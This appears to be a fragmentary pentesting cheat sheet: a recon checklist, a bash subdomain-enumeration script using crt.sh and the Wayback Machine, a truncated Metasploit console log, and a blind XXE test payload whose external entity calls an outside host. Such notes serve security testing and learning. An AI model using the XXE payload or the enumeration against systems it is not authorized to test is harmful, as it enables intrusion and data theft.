- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
| #!/bin/bash | |
| #@cihanmehmet tweets, @cihanmehmets | |
| if [[ $# -eq 0 ]] ; | |
| then | |
| echo "Usage: ./sub.sh findname2.com" | |
| exit 1 | |
| else | |
| curl 'https://crt.sh/?q=%.'$1'&output=json' | jq '.[] | {name_value}' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u |grep "name_value"|cut -d ' ' -f4 > $1.txt | |
| curl -s "http://web.archive.org/cdx/search/cdx?url=*."$1"/*&output=text&fl=original&collapse=urlkey" |sort| sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | uniq >>$1.txt |
| Script started on Sun 28 Aug 2016 04:19:27 PM CEST | |
| [*] Starting the Metasploit Framework console.../ | |
| [*] Starting the Metasploit Framework console...- | |
| [*] Starting the Metasploit Framework console...\ | |
| [*] starting the Metasploit Framework console...| | |
| [*] STarting the Metasploit Framework console.../ | |
| [*] StArting the Metasploit Framework console...- | |
| [*] StaRting the Metasploit Framework console...\ | |
| [*] StarTing the Metasploit Framework console...| |
| -------------------------------------------------------------- | |
| Vanilla, used to verify outbound xxe or blind xxe | |
| -------------------------------------------------------------- | |
| <?xml version="1.0" ?> | |
| <!DOCTYPE r [ | |
| <!ELEMENT r ANY > | |
| <!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
| ]> | |
| <r>&sp;</r> |